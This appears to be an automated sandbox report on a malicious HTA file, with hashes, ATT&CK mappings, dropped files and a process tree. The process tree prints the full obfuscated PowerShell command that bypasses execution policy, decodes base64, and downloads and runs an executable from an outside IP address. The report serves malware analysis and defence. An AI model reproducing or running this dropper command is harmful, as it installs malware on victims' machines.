4aa454e445cc37d965867da8c17b921cf031045b8ecb90dc1884522a794d32f4

General

Target

4aa454e445cc37d965867da8c17b921cf031045b8ecb90dc1884522a794d32f4.hta
Size

154KB
MD5

586dc2855cbce16da2db1a5840694321
SHA1

aa92aefd6a9f95dc8e38f4d3b406cf506df9335b
SHA256

4aa454e445cc37d965867da8c17b921cf031045b8ecb90dc1884522a794d32f4
SHA512

53685b59faf9cff6d5cc4d07d7cda09e384a412ce79c5fb11fd48d815005cc60bf56d944a0fde3c1c274e5565f2ff4385db6e2fa1461a3e7b8f0e446d4558779
SSDEEP

96:4owZw9d6yfaKPQEoXRUn+VO+ehLGOToQPU6ghhiXB3zn+/edxCUMIqh2SCw2QKSs:4LwSiolYyrk3DwQ

Score

8^/10

defense_evasion discovery execution

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow	pid	Process
4	2836	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

Processes:

powershell.exe

pid	Process
2836	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cvtres.exemshta.execmd.exepowershell.execsc.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid	Process
2836	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description	pid	Process
Token: SeDebugPrivilege	2836	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

mshta.execmd.exepowershell.execsc.exe

description	pid	Process	procid_target
PID 1244 wrote to memory of 2524	1244	mshta.exe	30
PID 1244 wrote to memory of 2524	1244	mshta.exe	30
PID 1244 wrote to memory of 2524	1244	mshta.exe	30
PID 1244 wrote to memory of 2524	1244	mshta.exe	30
PID 2524 wrote to memory of 2836	2524	cmd.exe	32
PID 2524 wrote to memory of 2836	2524	cmd.exe	32
PID 2524 wrote to memory of 2836	2524	cmd.exe	32
PID 2524 wrote to memory of 2836	2524	cmd.exe	32
PID 2836 wrote to memory of 584	2836	powershell.exe	33
PID 2836 wrote to memory of 584	2836	powershell.exe	33
PID 2836 wrote to memory of 584	2836	powershell.exe	33
PID 2836 wrote to memory of 584	2836	powershell.exe	33
PID 584 wrote to memory of 2564	584	csc.exe	34
PID 584 wrote to memory of 2564	584	csc.exe	34
PID 584 wrote to memory of 2564	584	csc.exe	34
PID 584 wrote to memory of 2564	584	csc.exe	34

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\4aa454e445cc37d965867da8c17b921cf031045b8ecb90dc1884522a794d32f4.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1244
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c PoWeRSHeLl -EX BYPAsS -Nop -w 1 -c DEviCECReDeNTIAlDepLOymEnt ; iNvOKe-EXPrESSIOn($(inVOkE-ExpREsSION('[SYSTeM.teXT.eNCoDIng]'+[ChaR]58+[chaR]58+'uTf8.GeTstRing([systEm.CoNVert]'+[chAR]0X3a+[cHAR]0X3a+'fRomBAse64sTrInG('+[CHar]34+'JGtHICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJFcmRlRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEV2Y3FORkllTVpRLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqc04sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFd3WkJZc25ULHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR096R3NXcnhhLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNTlBBc0dxV3YpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlhJdXFrUkJ1UE1aIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpDdWpLTCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRrRzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjk1LjE5Ny80MjEvdW5jLmV4ZSIsIiRlblY6QVBQREFUQVx1bmMuZXhlIiwwLDApO1N0YVJULVNsZUVwKDMpO2lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcdW5jLmV4ZSI='+[cHaR]0x22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2524
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    PoWeRSHeLl -EX BYPAsS -Nop -w 1 -c DEviCECReDeNTIAlDepLOymEnt ; iNvOKe-EXPrESSIOn($(inVOkE-ExpREsSION('[SYSTeM.teXT.eNCoDIng]'+[ChaR]58+[chaR]58+'uTf8.GeTstRing([systEm.CoNVert]'+[chAR]0X3a+[cHAR]0X3a+'fRomBAse64sTrInG('+[CHar]34+'JGtHICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJFcmRlRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEV2Y3FORkllTVpRLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqc04sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFd3WkJZc25ULHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR096R3NXcnhhLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNTlBBc0dxV3YpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlhJdXFrUkJ1UE1aIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEpDdWpLTCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRrRzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjk1LjE5Ny80MjEvdW5jLmV4ZSIsIiRlblY6QVBQREFUQVx1bmMuZXhlIiwwLDApO1N0YVJULVNsZUVwKDMpO2lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcdW5jLmV4ZSI='+[cHaR]0x22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2836
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jyiabzwz.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:584
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBBF0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBBEF.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2564

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESBBF0.tmp

Filesize
1KB

MD5
7ff072de2e0c240c3287eb11e7dc2863

SHA1
d2b188a187f1aa5bb563c0c5b3d3885908f90279

SHA256
7b07fab4022345dd924b7c52520cdb10cef08603302ac17cf436f57465d08ef0

SHA512
5235e8b99b3c0b4d42c1f16cc944720b9be00bea02104bc359576495384de89d00b17fe33692d1353c48fdc7b17a76c2c3055ae14fba63998fb54da2d310da4d

Download Submit
C:\Users\Admin\AppData\Local\Temp\jyiabzwz.dll

Filesize
3KB

MD5
8c26f5993509e5757511f0540a0ea798

SHA1
d265d45cb49238476ae15a58b144898ab40cfcf3

SHA256
131477c106dba8931227fdef34172fc2878c1013b4ad6f975e323c1f1ea8d94e

SHA512
ec5c9c0d17d82172770289a6e737d5b48b261ca58335b9a374964dcb3bbb71a8ffd82c149b56802407ee0594daf44f69452a09d8370d29b764ad4971842a9064

Download Submit
C:\Users\Admin\AppData\Local\Temp\jyiabzwz.pdb

Filesize
7KB

MD5
628b8535a1dfb6ff0777772d869428cc

SHA1
987bc55df3cc9e441fc5bd30c43380bf8f6211c1

SHA256
b464357546085a69a289878383813aa4a4be4fb960f64222be32ba93b07de84c

SHA512
06b5ac1c9850589a6a8ee0ecc405ed71090ca67498fe07ed4b43be7dab1ee630051868488e6b468ad29ecbf996b71a6e8e6a562397649f331ff62e9a6ad783f8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCBBEF.tmp

Filesize
652B

MD5
7040a45b97772a363a9422818bbf76b0

SHA1
927d60585121e8db4ab10a53beeacb99c48eb579

SHA256
349edc127b5134ff8d51e46f2b5c42b9f9f7d6b1f8486eb0c42d7892a9a006fd

SHA512
de06a705735999c7744f00062599301abfc4ecb3c34d3067db74a96908c1918adff68a78bb867d3d9439cb65d1d7efb52bdebdf2968e936b7b7bfa6b01b2c435

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jyiabzwz.0.cs

Filesize
482B

MD5
fb855dde451137351eb67570a43b18f5

SHA1
3e66d1786f6644d488d7b8a97a3f429518199f5e

SHA256
ff934921644479cabd71a146f687a208c7924197a310f2bdd86fcea1dcb3570f

SHA512
40bd0be759b332b735af39b6c82e24d6b093cbca1d5bde975078cbd28ce0d2e3f8c03c0559a42b7f68d482487b3157719d963428359245aef11db4823a6691cf

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jyiabzwz.cmdline

Filesize
309B

MD5
468593a3d403148e0d7da40068aa2a51

SHA1
ef78433911b729bd8b81b4d25650ca6983f773aa

SHA256
23e4eae7644a5b2cad2b5906f6440bdaeb99e7281d6bdca915535caf8a3aa14f

SHA512
ae96cbd9502fa87b5b1971685202807b03d57527d75214eb94d677a373734f9e502a3dccf5cd67ed61c8cf7e80053c069b286f1322530cf222e456f083169c89

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads